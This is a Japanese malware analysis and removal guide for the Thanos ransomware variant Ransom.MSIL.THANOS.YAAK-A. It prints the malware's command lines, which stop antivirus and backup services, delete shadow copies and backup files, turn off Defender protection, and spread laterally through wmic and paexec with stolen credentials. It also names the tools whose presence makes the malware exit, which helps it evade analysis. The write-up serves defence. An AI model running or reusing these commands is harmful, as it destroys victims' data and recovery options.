Ransom.MSIL.THANOS.YAAK-A

2020年12月7日

解析者: Bren Matthew Ebriega

別名:

Ransom:MSIL/Filecoder.DL!rfn (MICROSOFT); HEUR:Trojan-Ransom.Win32.Generic (KASPERSKY)

プラットフォーム:

Windows

危険度:

ダメージ度:

感染力:

感染確認数:

情報漏えい:

マルウェアタイプ: 身代金要求型不正プログラム（ランサムウェア）
破壊活動の有無: なし
暗号化: なし
感染報告の有無: はい

概要

感染経路インターネットからのダウンロード

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

マルウェアは、実行後、自身を削除します。

マルウェアは、特定のWebサイトからファイルをダウンロードし、ファイル名を変更した後、感染コンピュータ内に保存します。

身代金要求文書のファイルを作成します。以下のファイル拡張子を持つファイルは暗号化しません。

詳細

ファイルサイズ 93,184 bytes

タイプ EXE

メモリ常駐なし

発見日 2020年11月20日

ペイロード URLまたはIPアドレスに接続, メッセージボックスの表示, ファイルの暗号化

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のファイルを作成します。

%User Startup%\mystartup.lnk → points to %User Temp%\HOW_TO_DECYPHER_FILES.txt
%User Temp%\tmp{4 Hex Characters}.bat → For Mounting FreeDrives & Making Shared Folders Writable

マルウェアは、以下のプロセスを追加します。

powershell.exe Set-MpPreference -EnableControlledFolderAccess Disabled
net.exe stop avpsus /y
net.exe stop McAfeeDLPAgentService /y
net.exe stop mfewc /y
net.exe stop BMR Boot Service /y
net.exe stop NetBackup BMR MTFTP Service /y
net.exe stop DefWatch /y
net.exe stop ccEvtMgr /y
net.exe stop ccSetMgr /y
net.exe stop SavRoam /y
net.exe stop RTVscan /y
net.exe stop QBFCService /y
net.exe stop QBIDPService /y
net.exe stop Intuit.QuickBooks.FCS /y
net.exe stop QBCFMonitorService /y
net.exe stop YooBackup /y
net.exe stop YooIT /y
net.exe stop zhudongfangyu /y
net.exe stop stc_raw_agent /y
net.exe stop VSNAPVSS /y
net.exe stop VeeamTransportSvc /y
net.exe stop VeeamDeploymentService /y
net.exe stop VeeamNFSSvc /y
net.exe stop veeam /y
net.exe stop PDVFSService /y
net.exe stop BackupExecVSSProvider /y
net.exe stop BackupExecAgentAccelerator /y
net.exe stop BackupExecAgentBrowser /y
net.exe stop BackupExecDiveciMediaService /y
net.exe stop BackupExecJobEngine /y
net.exe stop BackupExecManagementService /y
net.exe stop BackupExecRPCService /y
net.exe stop AcrSch2Svc /y
net.exe stop AcronisAgent /y
net.exe stop CASAD2DWebSvc /y
net.exe stop CAARCUpdateSvc /y
net.exe stop sophos /y
sc.exe config SQLTELEMETRY start= disabled
sc.exe config SQLTELEMETRY$ECWDB2 start= disabled
sc.exe config SQLWriter start= disabled
sc.exe config SstpSvc start= disabled
taskkill.exe /IM mspub.exe /F
taskkill.exe /IM mydesktopqos.exe /F
taskkill.exe /IM mydesktopservice.exe /F
vssadmin.exe Delete Shadows /all /quiet
vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin.exe resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin.exe resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin.exe resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin.exe resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin.exe resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin.exe resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin.exe resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin.exe resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin.exe resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin.exe resize shadowstorage /for=h: /on=h: /maxsize=unbounded
del.exe /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
del.exe /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
del.exe /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
del.exe /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
del.exe /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
del.exe /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
cmd.exe /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
%System%\cmd.exe /C %User Temp%\tmp{4 Hex Characters}.bat
%System%\notepad.exe %Desktop%\HOW_TO_DECYPHER_FILES.txt
%System%\cmd.exe /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"
%System%\cmd.exe /C choice /C Y /N /D Y /T 3 & Del "{Malware FilePath}\{Malware Filename}"

(註：%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。. %Desktop%フォルダは、現在ログオンしているユーザのデスクトップです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Desktop" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\Desktop" です。)

マルウェアは、実行後、自身を削除します。

マルウェアは、以下の Mutex を作成し、メモリ上で自身の重複実行を避けます。

Global\3747bdbf-0ef0-42d8-9234-70d68801f407

マルウェアは、感染コンピュータ上のメモリに以下のプロセスを確認すると、自身を終了します。

CFF Explorer
de4dot
dnspy
dnspy-x86
dotpeek
dotpeek64
dumpcap
effetech http sniffer
fiddler
firesheep
http analyzer stand-alone
HTTPNetworkSniffer
ida64
IEWatch Professional
ilspy
intercepter
Intercepter-NG
LordPE
MegaDumper
NetworkMiner
NetworkTrafficView
NoFuserEx
ollydbg
PEiD
pe-sieve
procexp
procexp64
protection_id
RDG Packer Detector
sysinternals tcpview
tcpdump
UnConfuserEx
Universal_Fixer
wireshark
wireshark portable
x32dbg
x64dbg

他のシステム変更

マルウェアは、以下のレジストリ値を変更します。

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
CurrentVersion\Policies\System
EnableLinkedConnections = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
CurrentVersion\Policies\System
LocalAccountTokenFilterPolicy = 1

ダウンロード活動

マルウェアは、以下のWebサイトからファイルをダウンロードし、ファイル名を変更した後、感染コンピュータ内に保存します。

https://raw.{BLOCKED}usercontent.com/d35ha/ProcessHide/master/bins/ProcessHide{XX}.exe → %User Temp%\{8 Random Characters}.exe
Where {XX} can be 32 or 64 depending on the OS architecture.
https://www.{BLOCKED}min.com/paexec/paexec.exe → %User Temp%\{8 Random Characters}.exe

その他

マルウェアは、以下の拡張子をもつファイルを暗号化します。

7z
accdb
aes
aiff
asm
avi
backup
bak
bco
bz2
cdx
cert
class
cpp
cs
csr
csv
dat
dbf
dim
djvu
doc
docm
docx
dtsx
dwg
edb
eml
flac
fpt
gif
gpg
htm
html
hwp
java
jpeg
jpg
key
lay6
ldf
lgb
log
lst
m4a
mdb
mdf
mkv
mov
mp3
mp4
mpeg
mrimg
msg
myd
nd
ndf
nef
odb
odg
ods
odt
one
ora
ost
p12
pas
pdf
pem
pfx
php
png
ppt
pptx
psd
pst
qbb
qbw
rar
raw
rdl
rtf
sql
sqlite3
sqlitedb
svg
sxi
sxw
tar
tbl
tiff
tlg
txt
vbk
vbm
vdi
vib
vmdk
vmx
vsd
wav
xdw
xls
xlsm
xlsx
zip

マルウェアは、以下を実行します。

It clears Recycle Bin contents
It makes use of the following commands to hide itself from the following processes:
- Processes:
  - taskmgr
  - Taskmgr
  - procexp
  - procexp64
  - ProcessHacker
- Commands:
  - %User Temp%\{8 Random Characters}.exe {Process ID} {Malware Filename}.exe
  - %User Temp%\{8 Random Characters}.exe {Process ID} {Malware Filename}.exe *32
It encrypts Local Drives and (If ran with administrator privileges) Network Drives.
To encrypt Network Drives it does the following:
- It checks if the IP address found starts with:
  - 10.
  - 172.16.
  - 192.168.
- It copies itself to \\{IP Address}\Users\Public\{Malware Name}.exe
- It adds the following processes:
  - net.exe user \\{IP Address} /USER:{DOMAIN}\{UserName} {Password}
  - wmic.exe /node:{IP Address} /user:{DOMAIN}\{UserName} /password:{Password} process call create cmd.exe /c \\{IP Address}\Users\Public\{Malware Name}
  - %User Temp%\{8 Random Characters}.exe \\{IP Address} -u {DOMAIN}\{UserName} -p {Password} -d -f -h -s -n 2 -c {Malware FilePath}\{Malware Filename}

ランサムウェアの不正活動

マルウェアは、ファイル名に以下の文字列を含むファイルの暗号化はしません。

autoexec.bat
desktop.ini
autorun.inf
ntuser.dat
iconcache.db
bootsect.bak
boot.ini
ntuser.dat.log
thumbs.db
bootmgr
pagefile.sys
config.sys
ntuser.ini
Builder_Log
RSAKeys
HOW_TO_DECYPHER_FILES
Recycle.Bin
{Malware Filename}

マルウェアは、ファイルパスに以下の文字列を含むファイルの暗号化はしません。

Program Files
Windows
Perflogs
Internet Explorer
ProgramData
AppData

マルウェアは、暗号化されたファイルのファイル名に以下の拡張子を追加します。

.locked

マルウェアが作成する以下のファイルは、脅迫状です。

%User Temp%\HOW_TO_DECYPHER_FILES.txt
%Desktop%\HOW_TO_DECYPHER_FILES.txt
{Encrypted Directory}\HOW_TO_DECYPHER_FILES.txt

以下のファイル拡張子を持つファイルについては暗号化しません：

.locked
.exe
.EXE
.dll
.DLL

対応方法

対応検索エンジン: 9.800

初回 VSAPI パターンバージョン 16.364.03

初回 VSAPI パターンリリース日 2020年11月21日

VSAPI OPR パターンバージョン 16.365.00

VSAPI OPR パターンリリース日 2020年11月22日

手順 1

トレンドマイクロの機械学習型検索は、マルウェアの存在を示す兆候が確認された時点で検出し、マルウェアが実行される前にブロックします。機械学習型検索が有効になっている場合、弊社のウイルス対策製品はこのマルウェアを以下の機械学習型検出名として検出します。

Troj.Win32.TRX.XXPE50FFF038

手順 2

このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム（OS）の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル／フォルダ／レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

手順 3

Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 4

変更されたレジストリ値を修正します。

[ 詳細 ]

警告：レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
事前に意図的に対象の設定を変更していた場合は、意図するオリジナルの設定に戻してください。変更する値が分からない場合は、システム管理者にお尋ねいただき、レジストリの編集はお客様の責任として行なって頂くようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。

In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Policies\System
- From: EnableLinkedConnections = 1
  To: EnableLinkedConnections = {User Default}
In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Policies\System
- From: LocalAccountTokenFilterPolicy = 1
  To: LocalAccountTokenFilterPolicy = {User Default}

手順 5

以下のファイルを検索し削除します。

[ 詳細 ]

コンポーネントファイルが隠しファイル属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。

%User Startup%\mystartup.lnk
%User Temp%\HOW_TO_DECYPHER_FILES.txt
%Desktop%\HOW_TO_DECYPHER_FILES.txt
{Encrypted Directory}\HOW_TO_DECYPHER_FILES.txt

手順 6

最新のバージョン（エンジン、パターンファイル）を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Ransom.MSIL.THANOS.YAAK-A」と検出したファイルはすべて削除してください。検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

手順 7

暗号化されたファイルをバックアップから復元します。

ご利用はいかがでしたか？　アンケートにご協力ください